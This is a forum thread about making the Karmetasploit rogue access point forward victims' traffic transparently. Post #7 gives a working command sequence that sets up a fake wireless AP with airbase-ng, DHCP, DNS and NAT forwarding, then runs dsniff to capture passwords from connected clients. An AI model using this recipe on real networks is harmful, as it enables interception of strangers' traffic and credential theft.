Thread: Transparent Karmetasploit

  1. #1
    Just burned his ISO
    Join Date
    Aug 2006
    Posts
    3

    Transparent Karmetasploit

    I got Karmetasploit up and running following the tutorial on Metasploit's site (metasploit.com/dev/trac/wiki/Karmetasploit). Everything works fine; however, when a client connects to Karmetasploit, let's say the client tries to go to Google... Karmetasploit does its thing and gets information, but Google never loads.

    I can't seem to find any information on making Karmetasploit transparent. Has anybody figured it out?

  2. #2
    Just burned his ISO alihadi's Avatar
    Join Date
    Aug 2008
    Posts
    8

    What is your network configuration?
    How many NICs, and how are they configured?

  3. #3

    If you go back and read that documentation, it will tell you that it's a blackhole and doesn't forward traffic on.

  4. #4
    Just burned his ISO
    Join Date
    Aug 2006
    Posts
    3

    Yeah, I know. I saw a video of a demonstration of Karmetasploit and he had it working transparently (I don't remember where I saw the video). I was curious to see if anybody knows how he did it.

  5. #5
    Member Krytical's Avatar
    Join Date
    Mar 2010
    Posts
    117

    I have no clue, I have never used it... but I'm guessing you would need a separate Internet connection and have all traffic proxied through that connection... it'd be like bridging the connection.

    They connect to you, you have it getting their info, and then it passes it through to Google or whatever through the other connection...

    I don't think you can do it with just one connection...

  6. #6
    Member
    Join Date
    Sep 2008
    Posts
    146

    It would seem that the main issue would be how well your system can route traffic. If your system has all the functionality of a wireless AP, then it should be possible to masquerade as the friendly router and send the traffic back and forth.

    If you are trying to be just a transparent man in the middle that sniffs passwords (like what Cain and Abel does for wired connections), then there may be a better way of going about it than Karmetasploit, since the main function of Karmetasploit isn't to be passive but to find vulnerabilities, which is much easier if the client thinks you are a legit AP, and then exploit what you find to deliver your payload.

  7. #7

    To be able to do the attack the way you want, you have to install dnsmasq:
    Code:
    wget vvvvvv.thekelleys[org][uk]/dnsmasq/dnsmasq-2.45.tar.gz (I have not reached 15 posts)
    tar xvzf dnsmasq-2.45.tar.gz
    cd dnsmasq-2.45
    make && make install
    Once you have dnsmasq, create a conf file with the parameters you might need; then you can set up the machine to bridge from your wireless card to the NIC like this:

    Code:
    wlanconfig ath0 destroy                               # tear down the existing madwifi VAP
    airmon-ng start ath0                                  # bring the card up in monitor mode
    airbase-ng -c 1 -e testwlan ath0                      # soft AP "testwlan" on channel 1; creates the at0 tap interface
    ifconfig at0 192.168.179.1 up && dhcpd at0            # address the tap interface and hand out leases on it
    dnsmasq -C /etc/dnsmasq.conf &                        # DNS for the clients, using the conf file created above
    echo 1 > /proc/sys/net/ipv4/ip_forward                # let the kernel forward between at0 and eth0
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE  # NAT the client traffic out the wired uplink
    Once you are bridging and providing the correct DHCP and DNS info, run dsniff -c -m -i at0. Do use the latest drivers and patch them, and also use the latest SVN of aircrack-ng. Is this what you were looking for? Your mileage may vary depending on the card and the version of the driver.

  8. #8
    Member
    Join Date
    Sep 2008
    Posts
    146

    Hey Karma, any chance you could post the .conf file you used? I've been working on mine and I keep getting glitches and I'd like to compare them.
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  9. #9
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    I get this error when I follow your steps outlined above:
    Code:
     dnsmasq: failed to bind listening socket to 10.0.0.1: Address already in use
    or if I specify with -a:
    Code:
     dnsmasq: failed to create listening socket: Address already in use
    William

  10. #10
    Just burned his ISO
    Join Date
    Jan 2007
    Posts
    14

    I saw "The Middler" do this at the last DEF CON, and he wasn't using a 2nd bridged connection. He basically sat in the middle forging replies to both ends. Cool stuff, but I haven't found the code released yet...
